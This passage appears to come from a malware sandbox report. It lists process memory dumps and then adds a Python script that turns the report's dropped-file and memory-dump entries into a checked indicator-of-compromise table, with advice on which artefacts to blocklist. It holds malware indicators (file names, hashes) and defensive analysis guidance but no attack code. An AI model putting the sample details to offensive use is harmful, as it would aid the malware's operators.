                          4.7MB

                        • memory/2108-251-0x0000000006BC0000-0x00000000075CD000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/2108-377-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-252-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-696-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-56-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-282-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-671-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-57-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-422-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-637-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-587-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-146-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-208-0x0000000006BC0000-0x00000000075CD000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/2144-256-0x00000000000E0000-0x0000000000AED000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/2144-253-0x00000000000E0000-0x0000000000AED000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/2240-86-0x00000000047D0000-0x0000000004C10000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2240-135-0x00000000047D0000-0x0000000004C10000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2240-151-0x00000000047D0000-0x0000000004C10000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2240-88-0x00000000047D0000-0x0000000004C10000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2392-145-0x0000000000090000-0x000000000054F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2392-134-0x0000000000090000-0x000000000054F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2408-283-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-190-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-209-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-255-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-424-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-638-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-588-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-152-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-392-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2408-672-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2484-70-0x0000000000100000-0x0000000000110000-memory.dmp

                          Filesize

                          64KB

                        • memory/2508-299-0x0000000001170000-0x0000000001DC1000-memory.dmp

                          Filesize

                          12.3MB

                        • memory/2508-301-0x0000000001170000-0x0000000001DC1000-memory.dmp

                          Filesize

                          12.3MB

                        • memory/2588-32-0x0000000000CE0000-0x000000000119F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2588-28-0x0000000000CE0000-0x000000000119F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2588-15-0x0000000000CE0000-0x000000000119F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2664-420-0x00000000008D0000-0x0000000000F57000-memory.dmp

                          Filesize

                          6.5MB

                        • memory/2836-393-0x0000000000D60000-0x0000000001074000-memory.dmp

                          Filesize

                          3.1MB

                        • memory/2924-13-0x0000000006540000-0x00000000069FF000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2924-12-0x0000000006540000-0x00000000069FF000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/3032-186-0x00000000066C0000-0x0000000006B7F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/3420-685-0x0000000000FE0000-0x000000000147B000-memory.dmp

                          Filesize

                          4.6MB

                        • memory/3500-608-0x00000000008F0000-0x0000000000D48000-memory.dmp

                          Filesize

                          4.3MB

                        • memory/3500-607-0x00000000008F0000-0x0000000000D48000-memory.dmp

                          Filesize

                          4.3MB

                        • memory/3504-732-0x0000000000830000-0x0000000000842000-memory.dmp

                          Filesize

                          72KB

                        • memory/3504-733-0x0000000000240000-0x0000000000250000-memory.dmp

                          Filesize

                          64KB

                        • memory/3800-707-0x0000000000FD0000-0x0000000001040000-memory.dmp

                          Filesize

                          448KB

                        • memory/3928-655-0x000000001B620000-0x000000001B902000-memory.dmp

                          Filesize

                          2.9MB

                        • memory/3928-656-0x0000000001E80000-0x0000000001E88000-memory.dmp

                          Filesize

                          32KB

                        • memory/4012-864-0x000000001B890000-0x000000001BB72000-memory.dmp

                          Filesize

                          2.9MB

                        • memory/4012-865-0x0000000002770000-0x0000000002778000-memory.dmp

                          Filesize

                          32KB

                        • memory/4016-664-0x0000000002070000-0x0000000002078000-memory.dmp

                          Filesize

                          32KB

                        • memory/4016-663-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

                          Filesize

                          2.9MB

                        • memory/4072-747-0x0000000000AA0000-0x0000000000B00000-memory.dmp

                          Filesize

                          384KB
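The two listings above (dropped files with their sizes and digests, and memory regions dumped per process) are the raw material for a blocklist, but they are worth checking before they are exported. The following added example, written for this page and not part of the sandbox's own tooling, parses the listing as it appears here into an IOC table, validates the digests, confirms that each memory dump's address range agrees with the size the report prints for it, and looks up a blob of bytes against every digest at once. Two things are assumptions, noted in the code: that sizes are printed in base-1024 units rounded to the shown decimals (which holds for every memory entry above, e.g. 0x400000..0x466000 is exactly 408 KiB and 0x400000..0x840000 is 4.25 MiB, printed as 4.2MB), and that the middle number in `memory/<pid>-<n>-...` is the sandbox's dump sequence number, since the same PID and range recur under several values of it. The sample input is three entries copied from the listing.

```python
"""Parse a sandbox report's dropped-file / memory-dump listing into checked IOCs (added example)."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: three entries copied from the listing, in its bullet / label / value layout.
SAMPLE_REPORT = r"""
• C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
  Filesize
  1.6MB
  MD5
  1dc908064451d5d79018241cea28bc2f
  SHA1
  f0d9a7d23603e9dd3974ab15400f5ad3938d657a
  SHA256
  d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
  SHA512
  6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f
• memory/600-147-0x0000000000400000-0x0000000000840000-memory.dmp
  Filesize
  4.2MB
• memory/1688-237-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
  Filesize
  4KB
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
UNIT = {"B": 1, "KB": 1 << 10, "MB": 1 << 20, "GB": 1 << 30}
SIZE_RE = re.compile(r"^(\d+(?:\.(\d+))?)(B|KB|MB|GB)$")
# memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp; <n> assumed to be the sandbox's dump sequence number.
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


@dataclass
class Artifact:
    name: str
    size_text: str = ""
    hashes: Dict[str, str] = field(default_factory=dict)  # algorithm -> lowercase hex digest


def parse_report(text: str) -> List[Artifact]:
    """Each bullet: first non-blank line is the name, the rest alternate label / value."""
    artifacts = []
    for chunk in text.split("•")[1:]:
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        art = Artifact(name=lines[0])
        for label, value in zip(lines[1::2], lines[2::2]):
            if label == "Filesize":
                art.size_text = value
            elif label in HASH_LEN:
                art.hashes[label] = value.lower()
        artifacts.append(art)
    return artifacts


def size_bounds(size_text: str) -> Tuple[float, float]:
    """Byte interval a printed size stands for. Assumption: base-1024 units rounded to the
    shown decimals, so '4.2MB' covers 4.15..4.25 MiB and '408KB' covers 407.5..408.5 KiB."""
    m = SIZE_RE.match(size_text)
    if not m:
        raise ValueError(f"unrecognised size {size_text!r}")
    half_step = 0.5 * 10 ** -len(m.group(2) or "")
    unit = UNIT[m.group(3)]
    return (float(m.group(1)) - half_step) * unit, (float(m.group(1)) + half_step) * unit


def memory_region(name: str) -> Optional[Tuple[int, int, int, int]]:
    """(pid, sequence, start, end) for a memory dump name, else None."""
    m = MEM_RE.match(name)
    if not m:
        return None
    return int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)


def check_artifact(art: Artifact) -> List[str]:
    """Problems found: a malformed digest, or a dump whose address range disagrees
    with the size the report states for it (a sign of a truncated or mislabelled dump)."""
    problems = []
    for algo, digest in art.hashes.items():
        if len(digest) != HASH_LEN[algo] or set(digest) - set("0123456789abcdef"):
            problems.append(f"{art.name}: malformed {algo} {digest!r}")
    region = memory_region(art.name)
    if region and art.size_text:
        _, _, start, end = region
        lo, hi = size_bounds(art.size_text)
        if not lo - 1 <= end - start <= hi + 1:  # one byte of slack for float rounding
            problems.append(f"{art.name}: range is {end - start} bytes, report says {art.size_text}")
    return problems


def ioc_index(artifacts: List[Artifact]) -> Dict[str, str]:
    """Every digest of every artifact, whatever the algorithm, mapped to the artifact name."""
    return {d: a.name for a in artifacts for d in a.hashes.values()}


def digests(data: bytes) -> Dict[str, str]:
    return {algo: hashlib.new(algo.lower(), data).hexdigest() for algo in HASH_LEN}


def lookup(data: bytes, index: Dict[str, str]) -> Optional[str]:
    """Name of the reported artifact whose digest matches data, if any."""
    return next((index[d] for d in digests(data).values() if d in index), None)


if __name__ == "__main__":
    for a in parse_report(SAMPLE_REPORT):
        print(a.name, a.size_text, check_artifact(a) or "consistent")
```

Before pushing the table to a blocklist, filter it by name: the entries under `Recent\CustomDestinations` and the Firefox profile (`prefs.js`, `recovery.jsonlz4`, the glean pings) are host state that changed while the sample ran, so their digests are specific to this sandbox image and will never match another machine; the executables under `AppData\Roaming`, the `Temp...EXE` loader and the `Test Task17.job` scheduled-task file are the ones worth keeping. The memory dumps carry no digests at all; their value is the PID and address range, which is what you match against when carving the unpacked payload out of a live process.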